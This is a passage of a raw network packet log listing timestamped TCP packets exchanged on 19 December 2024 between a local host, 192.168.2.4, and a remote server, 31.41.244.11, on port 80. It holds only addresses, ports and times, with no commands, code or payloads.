                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.974137068 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.974194050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.974205971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.974246979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.975630999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.975670099 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.975727081 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.975769997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.977298975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.977338076 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.977402925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.977442026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.979058981 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.979099989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.979132891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.979171991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.980628014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.980668068 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.980712891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.980752945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.982309103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.982359886 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.982393980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.982431889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.984010935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.984057903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.984112024 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.984155893 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.985641003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.985686064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.985739946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.985781908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.987358093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.987399101 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.987426996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.987468004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.989031076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.989072084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.989103079 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.989142895 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.990693092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.990735054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.990776062 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.990814924 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.992379904 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.992420912 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.992429972 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.992477894 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.994040966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.994081974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.994138956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.994177103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.995764971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.995819092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.995897055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.995937109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.997385025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.997425079 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.997488976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.997528076 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.999072075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.999110937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.999207020 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.999245882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.000741005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.000781059 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.000816107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.000857115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.002456903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.002504110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.002557993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.002598047 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.004125118 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.004168987 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.004237890 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.004280090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.107254982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.107367039 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.107403040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.107573032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.107976913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.108036041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.108139038 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.108195066 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.108273029 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.108318090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.109503984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.109556913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.109613895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.109656096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.110877037 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.110929012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.110991001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.111040115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.112196922 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.112270117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.112344980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.112416029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.113567114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.113626957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.113656998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.113702059 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.114840031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.114888906 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.114970922 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.115016937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.116266966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.116278887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.116312981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.116326094 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.117424011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.117491961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.117553949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.117595911 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.118735075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.118781090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.118809938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.118850946 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.119982004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.120031118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.120127916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.120171070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.121278048 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.121340990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.121368885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.121412992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.122483969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.122545958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.122600079 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.122642994 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.123758078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.123825073 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.123830080 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.123874903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.124984026 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.125040054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.125071049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.125119925 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.126202106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.126262903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.126281023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.126322985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.127377987 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.127433062 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.127459049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.127499104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.128585100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.128638029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.128694057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.128735065 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.129760027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.129807949 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.129862070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.129904032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.130985975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.131028891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.131083965 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.131124020 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.132227898 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.132270098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.132302046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.132340908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.133384943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.133430958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.133502007 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.133538008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.134618044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.134660959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.134666920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.134699106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.135813951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.135864019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.135894060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.135941029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.137003899 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.137053967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.137104988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.137142897 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.138187885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.138257027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.138286114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.138324022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.139395952 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.139448881 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.139522076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.139559984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.140635014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.140685081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.140714884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.140752077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.141868114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.141916037 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.141918898 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.141954899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.143040895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.143095016 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.143126011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.143168926 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.144288063 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.144335032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.144335032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.144376040 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.145437002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.145487070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.145514011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.145555973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.146662951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.146718979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.146821976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.146872044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.147839069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.147893906 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.147924900 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.147968054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.149081945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.149108887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.149133921 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.149158955 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.150314093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.150326014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.150377035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.151473045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.151535988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.151549101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.151592970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.152661085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.152713060 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.152770042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.152817965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.153848886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.153898001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.153964996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.154004097 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.155011892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.155066967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.155241966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.155284882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.156276941 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.156294107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.156325102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.156347990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.157450914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.157499075 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.157636881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.157679081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.158705950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.158750057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.158751011 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.158793926 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.159910917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.159924030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.159956932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.159965992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.161031961 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.161072016 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.161128998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.161170006 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.162266970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.162311077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.162329912 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.162379980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.163466930 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.163512945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.163542032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.163584948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.164652109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.164696932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.164756060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.164798021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.165839911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.165884018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.165963888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.166007996 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.167064905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.167114973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.167262077 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.167304993 CET4983880192.168.2.431.41.244.11
